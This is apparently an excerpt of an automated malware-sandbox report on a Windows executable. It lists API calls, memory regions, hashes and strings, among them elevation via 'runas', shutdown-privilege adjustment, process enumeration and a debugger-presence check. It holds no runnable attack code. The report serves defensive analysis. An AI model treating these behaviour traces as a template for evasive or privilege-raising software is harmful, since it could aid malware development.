                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateFreeHandleInitializeModuleVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 4173726493-1888249752
                                                                                    • Opcode ID: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction ID: ac35d0f59487471c61e1a1342d4049f29feb693cc75a8e69d60280a94490ce98
                                                                                    • Opcode Fuzzy Hash: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction Fuzzy Hash: 7C519671A44705AADF51DBE58C62BFF7BE8FF05344F90082AFA00E7191E638E9408769
                                                                                    APIs
                                                                                      • Part of subcall function 0063DBC0: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                      • Part of subcall function 0063DBC0: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                      • Part of subcall function 0063DBC0: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                      • Part of subcall function 0063DBC0: CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                      • Part of subcall function 0063DCD0: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,0063DD61,?,00000097,?,?,0063DDDB,00000000,0063DEF3,?,?,00000001), ref: 0063DCFF
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0063DE2B
                                                                                    • GetLastError.KERNEL32(00000000,0063DEF3,?,?,00000001), ref: 0063DE34
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 0063DE81
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0063DEA7
                                                                                    • CloseHandle.KERNEL32(00000000,0063DED8,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DECB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 254331816-221126205
                                                                                    • Opcode ID: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction ID: 19f62c8c6b26142c15b7ccd5ce8ac2d9ded865074aa3ecb0be12b35c3f976091
                                                                                    • Opcode Fuzzy Hash: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction Fuzzy Hash: 69317671E002099FDB10EFA9E8826EDBAB9FF44704F50057DF514E7391DB7499408B95
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 0063E5C1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E5DE
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0063E603
                                                                                      • Part of subcall function 005963F8: IsWindow.USER32(?), ref: 00596406
                                                                                      • Part of subcall function 005963F8: EnableWindow.USER32(?,000000FF), ref: 00596415
                                                                                    • GetActiveWindow.USER32 ref: 0063E6CF
                                                                                    • SetActiveWindow.USER32(0065C5D1,0063E737,0063E74D,?,?,000000EC,?,000000F0,00000000,?,00000000), ref: 0063E720
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                                    • String ID: D.S$Dc$`$qc
                                                                                    • API String ID: 4222481217-1700508051
                                                                                    • Opcode ID: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction ID: a68385297073a1787c46507cafb47a44eecf45f015a0fdb6403bc58eaa920278
                                                                                    • Opcode Fuzzy Hash: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction Fuzzy Hash: 64518C74A00249AFDB00DFA9C885ADEBBF6FB09314F154169F804EB391D776A941CFA0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041AD90,?,?), ref: 0040C2BD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040C2CE
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3CE
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3E0
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3EC
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C431
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction ID: 129811935084e97536274d2d3cc39016278ad45ca87abc2192b8d5c1b695ba56
                                                                                    • Opcode Fuzzy Hash: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction Fuzzy Hash: 8841A471E00518DBCB10EBA4C8C5ADE73B5AF44310F5586BAD504F73C1E778AE458A8D
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CD18E4
                                                                                    • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 00CD190A
                                                                                    • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 00CD193E
                                                                                    • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 00CD1990
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00CD199B
                                                                                    • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 00CD19B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                    • String ID:
                                                                                    • API String ID: 4292518056-3916222277
                                                                                    • Opcode ID: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                    • Instruction ID: 59ac2d4fe5a4cc459e1b54a56f04bed69ab36ee7b51a9f1357a70336514bb746
                                                                                    • Opcode Fuzzy Hash: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                    • Instruction Fuzzy Hash: 05311675A40218FFE700DF94CC99FAA77B9EB48701F248119FA05AB291C770DB01CB65
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 005FA9D7
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FA9FE
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FAA03
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 005FAA14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction ID: 775351c24a523f7ca86ab9856cb2a99195e947980098857579868bc878f92e5d
                                                                                    • Opcode Fuzzy Hash: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction Fuzzy Hash: D9F062B068430675E610E6718E07FBE2588AB40B48F900C1AF789E50D2E7ADD4588677
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A,?,00000000,00000000,00000000), ref: 006507A5
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 00650828
                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 00650840
                                                                                    • FindClose.KERNEL32(000000FF,0065086B,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 0065085E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction ID: 7e40c14d5cf5c67ddc04c5ae91bd146497d11b7686551e4e99c720dcad4bb53e
                                                                                    • Opcode Fuzzy Hash: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction Fuzzy Hash: 4F319471A0061C9FEF10EB65CC45ADEB7F9EB88305F5145FAE804B3291EA389E84CE54
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                    • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                    • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                    • String ID:
                                                                                    • API String ID: 3952204985-0
                                                                                    • Opcode ID: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                    • Instruction ID: d3f3af0a4508f7e27652e937122bdb82b1fceeeb5c55f2899ae714965ea1cc71
                                                                                    • Opcode Fuzzy Hash: d700407f97133983200a604a132ece7da35f72d1459ff1b8adab73a8017f2e83
                                                                                    • Instruction Fuzzy Hash: C3217175900218BBEB50DBE4CC89FEEB7B8EB49741F108198F614A61D5D770AB48CB60
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 005B2661
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005B267E
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B26A3
                                                                                    • GetActiveWindow.USER32 ref: 005B26B1
                                                                                    • MessageBoxW.USER32(00000000,00000000,?,-0000002D), ref: 005B26DE
                                                                                    • SetActiveWindow.USER32(?,005B270C,?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    • Opcode ID: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction ID: 0959946ea7ea2d423f2b07d1ac2efebd9c7287cb6bf5dae26c143587a2194954
                                                                                    • Opcode Fuzzy Hash: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction Fuzzy Hash: 89318B34A04605AFDB00EFA9DD86EDE7BE9FB49350F5045A5F410E73A1DA78AD00DB24
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                    • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                    • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 1045392073-0
                                                                                    • Opcode ID: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                    • Instruction ID: 4823d0db6d89783cfdf2c75b6990e32170b40ac30757b8ad96a9877ce2fabe7b
                                                                                    • Opcode Fuzzy Hash: 8011eff28b9dcc925b3679dcf16cbb184ae846e5613d95cdaca105e06b2e6a1a
                                                                                    • Instruction Fuzzy Hash: 9031C779D052289ADB51DFA4DD89BCDBBB8BF08300F1041AAE40DAB250E7719BC48F45
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?,?,00644460), ref: 00465253
                                                                                    • LoadResource.KERNEL32(00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?), ref: 0046526D
                                                                                    • SizeofResource.KERNEL32(00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000), ref: 00465287
                                                                                    • LockResource.KERNEL32(00464B24,00000000,00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000), ref: 00465291
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction ID: cc44b1e40f387fa113896bb731206f382d166b60eb9947859bc6d233c5ebbc2f
                                                                                    • Opcode Fuzzy Hash: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction Fuzzy Hash: 32F0D1B36046046F5744EE9DA881D9B77ECEE89368310015FF908C7206EA38DE118779
                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BEEE
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BF0A
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040BFA9,?,0041AD90,?,00000000), ref: 0040BF1B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$Valid
                                                                                    • String ID:
                                                                                    • API String ID: 1826331170-0
